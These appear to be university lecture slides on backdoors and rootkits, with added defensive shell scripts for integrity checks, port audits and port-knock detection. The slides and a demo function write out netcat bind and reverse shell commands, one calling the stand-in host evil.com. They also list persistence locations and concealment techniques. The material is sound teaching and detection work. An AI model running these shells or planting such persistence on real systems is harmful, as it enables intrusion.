CIT 380: Securing Computer Systems: Backdoors and Rootkits (lecture slides)


Slide 1: Backdoors and Rootkits

Slide 2: Topics
Backdoors
– Backdoor types
– Netcat backdoors
– Reverse telnet
– Concealing backdoors
Rootkits
– User-mode rootkits
– Kernel rootkits
– Detecting rootkits
– Recovery from a rootkit

Slide 3: Types of Backdoors
– Local privilege escalation: a way back to root for an attacker who can already log in (e.g., a hidden setuid root shell).
– Remote command execution: the attacker sends single commands to be run on the victim.
– Remote shell access: an interactive shell over the network.
– Remote GUI control: full desktop control, as with VNC-style tools.

Slide 4: Starting Backdoors on UNIX
– /etc/inittab
– Startup scripts in /etc/rc.d and /etc/init.d: add a new script, or modify an existing one (on systemd hosts, unit files under /etc/systemd/system play the same role).
– inetd: add a new service to /etc/inetd.conf.
– User startup scripts: .bashrc, .login, .cshrc, .xinitrc, .xsession, etc.
– cron

Slide 5: Starting Backdoors on Windows
– Autostart folders: C:\Documents and Settings\[user]\Start Menu\Programs\Startup (on Vista and later, %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup)
– Startup scripts: C:\Windows\win.ini, System.ini, Wininit.ini, etc.
– Registry keys: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and many others (the HKCU counterpart, the RunOnce keys, ...)
– Task Scheduler

Slide 6: Finding Backdoor Scripts
– Manual scan: time-consuming and error prone.
– Automatic: on UNIX, chkrootkit or Titan; on Windows, Autoruns from www.sysinternals.com
– File integrity check: a HIDS such as Tripwire or Osiris hashes the startup files and configuration while the system is known-good, then reports anything added, removed or changed since that baseline.
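As an added example, not code from the slides or the textbook, the following POSIX shell script does in miniature what slides 4 and 6 describe: it hashes the UNIX autostart locations from slide 4 into a baseline manifest and later reports files that were added, removed or changed, which is the core of what Tripwire and Osiris do. The path list, the sha256sum/shasum fallback, and the file names used by the demo (a constructed stand-in for /etc/init.d in a temporary directory) are assumptions, not anything the slides state.

```shell
#!/bin/sh
# Added example: hash-baseline audit of UNIX autostart locations.
# Not code from the slides; the path list is an assumption, adjust per distribution.
AUTOSTART_PATHS="/etc/inittab /etc/inetd.conf /etc/rc.d /etc/init.d /etc/crontab /etc/cron.d /var/spool/cron /etc/systemd/system"

# sha256sum on GNU systems, shasum on BSD/macOS; both print "<hash>  <path>".
if command -v sha256sum >/dev/null 2>&1; then HASH=sha256sum; else HASH="shasum -a 256"; fi

# Emit "<hash>  <path>" for every regular file under the given roots, sorted by path.
# Roots that do not exist are skipped; paths containing newlines are out of scope.
hash_tree() {
  for root in "$@"; do
    [ -e "$root" ] || continue
    find "$root" -type f 2>/dev/null
  done | sort | while IFS= read -r f; do
    $HASH "$f"
  done
}

# Compare two manifests (baseline, current) and print one
# "ADDED|REMOVED|CHANGED <path>" line per difference, sorted.
diff_manifests() {
  awk '{ p = substr($0, length($1) + 3) }          # path follows the hash and two spaces
       NR == FNR { base[p] = $1; next }            # first file: baseline
       { cur[p] = $1 }                             # second file: current state
       END {
         for (f in cur) {
           if (!(f in base)) { print "ADDED " f }
           else if (cur[f] != base[f]) { print "CHANGED " f }
         }
         for (f in base) { if (!(f in cur)) { print "REMOVED " f } }
       }' "$1" "$2" | sort
}

# Demo on a constructed stand-in for /etc/init.d: take a baseline, then plant a
# new rc script and append a reverse shell to an existing one, as an intruder would.
# Prints the differences with the temporary directory prefix stripped.
demo() {
  d=$(mktemp -d) || return 1
  mkdir -p "$d/init.d"
  printf '#!/bin/sh\n/usr/sbin/sshd\n' > "$d/init.d/sshd"
  printf '#!/bin/sh\n/usr/sbin/cron\n' > "$d/init.d/cron"
  hash_tree "$d/init.d" > "$d/baseline"
  printf '#!/bin/sh\nnc -l -p 2222 -e /bin/sh &\n' > "$d/init.d/z99-update"   # planted bind shell
  printf 'nc evil.com 80 -e /bin/sh &\n' >> "$d/init.d/cron"                  # modified script
  hash_tree "$d/init.d" > "$d/current"
  diff_manifests "$d/baseline" "$d/current" | sed "s#$d/init.d/##"
  rm -rf "$d"
}

# Usage: sh audit.sh demo
#        sh audit.sh baseline /var/lib/autostart.sha256   (hash the real autostart paths)
#        sh audit.sh check    /var/lib/autostart.sha256   (diff current state against it)
case "${1:-}" in
  demo)     demo ;;
  baseline) hash_tree $AUTOSTART_PATHS > "$2" ;;
  check)    hash_tree $AUTOSTART_PATHS > "$2.now" && diff_manifests "$2" "$2.now" ;;
esac
```

The baseline is only as trustworthy as the moment it was taken and the place it is stored: take it from a freshly installed system and keep the manifest off the host (or on read-only media), since an intruder who can edit rc scripts can also edit a manifest lying next to them.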

Slide 7: Netcat Backdoors
# nc -l -p 2222 -e /bin/sh      (server on victim)
$ nc victim.org 2222            (client on attacker host)
[Figure: the netcat client on the attacker host and the netcat server on the victim, each side's stdin and stdout joined across the network, so keystrokes typed into the client become input to /bin/sh and the shell's output flows back to the client.]
Caveat: the -e option exists in netcat-traditional and in Nmap's ncat; the OpenBSD netcat that many distributions ship omits it, and older versions of that build also reject -l together with -p.

Slide 8: Reverse Backdoors
What if the firewall blocks port 2222? What if the firewall blocks all incoming connections to victim.org?
Solution: make the victim connect out instead.
– Run the listener on the attacker host (evil.com):  nc -l -p 80
– Run the client with a shell on the victim host:  nc evil.com 80 -e /bin/sh
The connection is outbound from the victim, on a port that most sites allow out for web browsing, so a packet filter that only blocks inbound connections never sees anything to block.

Slide 9: Remote-Control Backdoors
List of thousands: http://www.megasecurity.org/Main.html

Slide 10: Windows Control Tools (Page 559)
– VNC: http://www.realvnc.com/
– Dameware: http://www.dameware.com/
– Back Orifice 2000: www.bo2k.com
– SubSeven: http://www.packetstormsecurity.org/

Slide 11: Remote Control Backdoor Capabilities (Table 10.3, Page 559-601)
– Pop-up dialogs to dupe the user into entering information
– Keystroke logger
– List detailed system information
– Gather passwords
– Change registry settings
– Remote shell access

Slide 12: BO2K (Page 562, Figure 10.3)

Slide 13: Distribution (Page 564, Figure 10.4)
– Email as an attachment, sent from an infected machine to everyone in its contact list.
– In a wrapper program such as a game, a greeting card, etc.
– Once installed, the backdoor emails the attacker or notifies the attacker via IRC.
– ActiveX: code is sent from a web server to a browser, where it is executed; ActiveX can do anything on the user's machine that the user can do.

Slide 14: Defenses against Backdoors
Detection
– Port scans, e.g., nmap, compared against the list of services the host is supposed to run: a bind shell such as the netcat listener on 2222 shows up as an unexpected open port. Reverse and sniffing backdoors open no listening port until they are triggered, so port scans alone do not find them.
Prevention
– Firewall on the local host.
– Use a proxying firewall instead of a packet filter: an application proxy that speaks HTTP will not relay the raw shell traffic of a reverse backdoor on port 80, whereas a packet filter checks only addresses and ports.
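The host-side counterpart of the port scan on this slide, as an added example that is not code from the slides: a shell function that compares the host's own listening TCP ports with an allowlist of expected services. It parses the column layout of `ss -ltn` (also valid for `ss -ltnp`); the sample output below is constructed, and the allowlist is an assumption.

```shell
#!/bin/sh
# Added example: flag listening TCP ports that are not on an allowlist.
# Reads `ss -ltn` (or `ss -ltnp`) output on stdin; prints one unexpected port per line.
unexpected_listeners() {
  # $1: space-separated allowlist of ports, e.g. "22 631"
  awk -v allow=" $1 " '
    $1 != "LISTEN" { next }          # skip the header line
    {
      port = $4                      # Local Address:Port, e.g. 0.0.0.0:22 or [::]:22
      sub(/.*:/, "", port)           # keep only what follows the last colon
      if (index(allow, " " port " ") == 0 && !(port in seen)) { seen[port] = 1; print port }
    }' | sort -n
}

# Constructed sample of `ss -ltn` output; 2222 is the netcat bind shell from slide 7.
sample_ss() {
  cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*
LISTEN 0      128    [::]:22             [::]:*
LISTEN 0      4096   127.0.0.1:631       0.0.0.0:*
LISTEN 0      1      0.0.0.0:2222        0.0.0.0:*
EOF
}
```

On a live host, run `ss -ltnp | unexpected_listeners "22 631"` and resolve each flagged port to its process with the `-p` column. Two limits to keep in mind: a kernel rootkit can hide a socket from ss, so an external nmap scan is the cross-check, and a reverse or sniffing backdoor never appears here at all, which is why egress filtering and the file-integrity checks of slide 6 are needed alongside port audits.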

Slide 15: Concealing Backdoors
Encryption
– Pipe the shell traffic through an encryption program.
– Use cryptcat (netcat with built-in encryption) or socat (which can wrap the connection in SSL/TLS).
Backdoors without ports
– ICMP backdoors: Loki, ICMP tunnel.
– Sniffing backdoors.

Slide 16: Non-promiscuous Sniffing Backdoors
cd00r sniffs all traffic addressed to the victim host (non-promiscuously, so only its own traffic) without opening any port, so neither a port scan nor netstat shows anything.
– Waits for the appropriate port-knock sequence: SYNs to a preset list of ports, in the preset order.
– After the knock it can:
  Open a TCP shell port (5002).
  Reverse-telnet a shell to the attacker host.
  Sniff further commands off the wire.
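To make concrete what cd00r waits for, here is an added example (not cd00r's code and not from the slides) that finds sources completing a port-knock sequence in a log of inbound SYNs. The input is a constructed one-packet-per-line `<time> <source> <dport>` format of the kind one can derive from tcpdump or firewall logs; the knock sequence 1234 5678 9012 and the sample addresses are assumptions.

```shell
#!/bin/sh
# Added example: report sources that completed a port-knock sequence.
# Input lines on stdin: "<time> <src-ip> <dst-port>", one inbound SYN each.
knock_detect() {
  # $1: the knock sequence in order, e.g. "1234 5678 9012"
  awk -v seq="$1" '
    BEGIN { n = split(seq, want, " ") }
    {
      src = $2; port = $3
      next_idx = prog[src] + 1                       # which knock this source is on (1-based)
      if (port == want[next_idx])  prog[src] = next_idx   # correct next knock
      else if (port == want[1])    prog[src] = 1          # wrong port, but a fresh start
      else                         prog[src] = 0          # anything else resets the sequence
      if (prog[src] == n) { print src " " $1; prog[src] = 0 }   # full sequence seen
    }'
}

# Constructed sample: one host knocks correctly, another sends the same three
# ports out of order and never completes the sequence.
sample_syns() {
  cat <<'EOF'
10:00:01 198.51.100.7 1234
10:00:01 198.51.100.7 5678
10:00:02 198.51.100.7 9012
10:00:05 203.0.113.9 1234
10:00:06 203.0.113.9 9012
10:00:07 203.0.113.9 5678
10:00:09 203.0.113.9 5678
EOF
}
```

Real knockers usually add a time window and look at more than the port (TCP flags, option fields), so a production detector would carry the timestamp into the state; the point here is that the knock is visible on the wire even though the victim host shows no open port, so network-side capture, not the host's own socket table, is where this kind of backdoor is caught.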

Slide 17: Promiscuous Sniffing Backdoors
1. Install the sniffing backdoor on the victim host.
2. Send backdoor commands to a "sucker" host on the same network segment as the victim; the victim is never the packets' destination.
3. The backdoor, sniffing promiscuously, reads the commands off the wire.
4. The backdoor responds with packets forged to appear to come from the sucker host, so the victim never appears as an endpoint of the conversation.

Slide 18: Promiscuous Sniffing Backdoors
[Figure: the attacker host on the Internet, the firewall, and behind it the victim host and the sucker host on one segment; the attacker's packets cross the firewall to the sucker host, the victim sniffs them, and its replies are spoofed as coming from the sucker host.]

